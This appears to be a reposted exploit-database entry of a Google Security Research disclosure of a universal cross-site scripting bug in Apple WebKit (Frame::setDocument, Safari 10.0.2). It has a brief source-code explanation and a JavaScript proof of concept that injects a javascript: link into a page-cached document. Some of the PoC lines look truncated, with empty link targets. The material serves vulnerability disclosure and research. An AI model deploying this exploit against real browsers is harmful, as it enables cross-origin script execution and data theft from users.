Apple WebKit 10.0.2(12602. - 'Frame::setDocument (1)' Universal Cross-S
来源:Google Security Research 作者:Google 发布时间:2017-04-05
<!-- Source: void Frame::setDocument(RefPtr<Document>&& newDocument) { ASSERT(!newDocument || newDocument->frame() == this); if (m_doc && m_doc->pageCacheState() != Document::InPageCache) m_doc->prepareForDestruction(); m_doc = newDocument.copyRef(); ... } The function |prepareForDestruction| only called when the cache state is not |Document::InPageCache|. So the frame will be never detached from the cached document. PoC: --> "use strict"; document.write("click anywhere to start"); window.onclick = () => { let w = open("about:blank", "one"); let d = w.document; let a = d.createElement("a"); a.href = "";; <<------- about:blank -> Document::InPageCache let it = setInterval(() => { try { w.location.href.toString; } catch (e) { clearInterval(it); let s = d.createElement("a"); <<------ about:blank's document s.href = "javascript:alert(location)";; } }, 0); }; <!-- Tested on Safari 10.0.2(12602. -->
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